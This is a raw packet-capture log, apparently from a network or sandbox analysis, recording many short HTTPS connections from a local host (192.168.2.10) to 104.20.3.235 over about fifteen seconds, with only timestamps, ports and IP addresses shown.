Oct 3, 2024 03:34:41.804219961 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:42.267769098 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:42.267847061 CEST	49727	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:42.269471884 CEST	49727	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:42.269485950 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:42.269714117 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:42.271181107 CEST	49727	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:42.315402985 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:43.763864994 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:43.763947964 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:43.764045000 CEST	49727	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:43.764244080 CEST	49727	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:43.764244080 CEST	49727	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:43.764298916 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:43.764328957 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:43.914901018 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:43.915014029 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:43.915127039 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:43.915417910 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:43.915447950 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.528259993 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.528379917 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.529666901 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.529675961 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.529905081 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.531410933 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.579391956 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.677105904 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.677192926 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.677248955 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.677417040 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.677440882 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.677468061 CEST	49728	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.677474022 CEST	443	49728	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.787506104 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.787568092 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:44.787642002 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.787941933 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:44.787952900 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.248596907 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.248675108 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.264199018 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.264266968 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.264588118 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.265768051 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.307414055 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.402683020 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.402765036 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.402842999 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.403029919 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.403048992 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.403063059 CEST	49729	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.403069019 CEST	443	49729	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.512933016 CEST	49730	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.513011932 CEST	443	49730	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.513088942 CEST	49730	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.513489008 CEST	49730	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.513500929 CEST	443	49730	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.801511049 CEST	49730	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.803328991 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.803379059 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:45.803536892 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.803886890 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:45.803900957 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.266364098 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.266439915 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.267529964 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.267539024 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.267755032 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.268944025 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.315407991 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.433442116 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.434434891 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.434568882 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.434796095 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.434849024 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.434880018 CEST	49731	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.434895992 CEST	443	49731	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.610121012 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.610158920 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:46.610251904 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.610538006 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:46.610551119 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.085190058 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.085320950 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.086453915 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.086467028 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.086668968 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.088279963 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.135401011 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.212677956 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.212779999 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.212852955 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.212996960 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.213016987 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.213042021 CEST	49732	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.213047981 CEST	443	49732	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.329498053 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.329560995 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.329895973 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.329895973 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.329937935 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.813486099 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.813610077 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.814851999 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.814863920 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.815088034 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.816589117 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.863400936 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.969664097 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.969774008 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.969849110 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.970009089 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.970021009 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:47.970043898 CEST	49733	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:47.970050097 CEST	443	49733	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.079787970 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.079863071 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.079943895 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.080224037 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.080239058 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.557476997 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.557549953 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.558846951 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.558860064 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.559143066 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.560295105 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.603404045 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.713011980 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.713112116 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.713187933 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.713340044 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.713351965 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.713377953 CEST	49734	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.713383913 CEST	443	49734	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.831423044 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.831479073 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:48.831547976 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.831830025 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:48.831842899 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.283436060 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.283533096 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.284945965 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.284957886 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.285196066 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.286515951 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.331397057 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.408061981 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.408332109 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.408457041 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.408597946 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.408613920 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.408627033 CEST	49735	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.408632994 CEST	443	49735	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.536906958 CEST	49736	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.536971092 CEST	443	49736	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.537064075 CEST	49736	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.537414074 CEST	49736	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.537427902 CEST	443	49736	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.806698084 CEST	49736	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.808542013 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.808593035 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:49.808656931 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.808959961 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:49.808973074 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.305907965 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.305998087 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.308459997 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.308473110 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.308765888 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.310744047 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.351402044 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.467031002 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.467147112 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.467223883 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.467370033 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.467427015 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.467464924 CEST	49737	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.467479944 CEST	443	49737	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.586069107 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.586147070 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:50.586231947 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.586536884 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:50.586572886 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.043014050 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.043102026 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.044399977 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.044425011 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.044688940 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.046116114 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.087423086 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.177452087 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.177571058 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.177658081 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.177798033 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.177836895 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.178014994 CEST	49738	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.178030968 CEST	443	49738	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.288964033 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.289020061 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.289097071 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.289470911 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.289485931 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.747494936 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.747622013 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.748663902 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.748693943 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.748913050 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.750391960 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.795397997 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.907927036 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.908025026 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.908112049 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.908323050 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.908369064 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:51.908399105 CEST	49739	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:51.908413887 CEST	443	49739	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.025437117 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.025492907 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.025561094 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.025823116 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.025840044 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.483228922 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.483355999 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.484667063 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.484694958 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.485028028 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.486151934 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.531404972 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.670439005 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.670542955 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.670625925 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.670773983 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.670773983 CEST	49740	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.670816898 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.670842886 CEST	443	49740	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.786447048 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.786489010 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:52.787406921 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.787406921 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:52.787436962 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.272023916 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.272656918 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.273955107 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.273967028 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.274174929 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.275381088 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.319401026 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.403007984 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.403089046 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.403250933 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.403403044 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.403419971 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.403430939 CEST	49741	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.403435946 CEST	443	49741	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.513199091 CEST	49742	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.513237953 CEST	443	49742	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.513325930 CEST	49742	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.514060020 CEST	49742	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.514077902 CEST	443	49742	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.799540043 CEST	49742	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.801316023 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.801379919 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:53.801534891 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.802056074 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:53.802073002 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.268681049 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.268781900 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.269934893 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.269959927 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.270459890 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.272030115 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.319422007 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.401106119 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.401222944 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.401302099 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.401535034 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.401560068 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.401576996 CEST	49743	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.401582956 CEST	443	49743	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.514998913 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.515055895 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.515124083 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.515427113 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.515439987 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.976373911 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.976478100 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.978100061 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:54.978110075 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.978476048 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:54.979592085 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.027447939 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.115083933 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.115173101 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.115245104 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.115479946 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.115526915 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.115557909 CEST	49744	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.115573883 CEST	443	49744	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.232759953 CEST	49745	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.232842922 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.233030081 CEST	49745	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.233352900 CEST	49745	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.233386040 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.688456059 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.688604116 CEST	49745	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.689867020 CEST	49745	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.689879894 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.690175056 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.691299915 CEST	49745	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.735405922 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.824942112 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.825072050 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.825129032 CEST	49745	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.825270891 CEST	49745	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.825294018 CEST	443	49745	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.935136080 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.935175896 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:55.935266018 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.935590029 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:55.935604095 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.388889074 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.388972998 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.390283108 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.390291929 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.390536070 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.391634941 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.439393997 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.543534040 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.543665886 CEST	443	49746	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:56.543739080 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.543857098 CEST	49746	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:56.543875933 CEST	443	49746	104.20.3.235	192.168.2.10
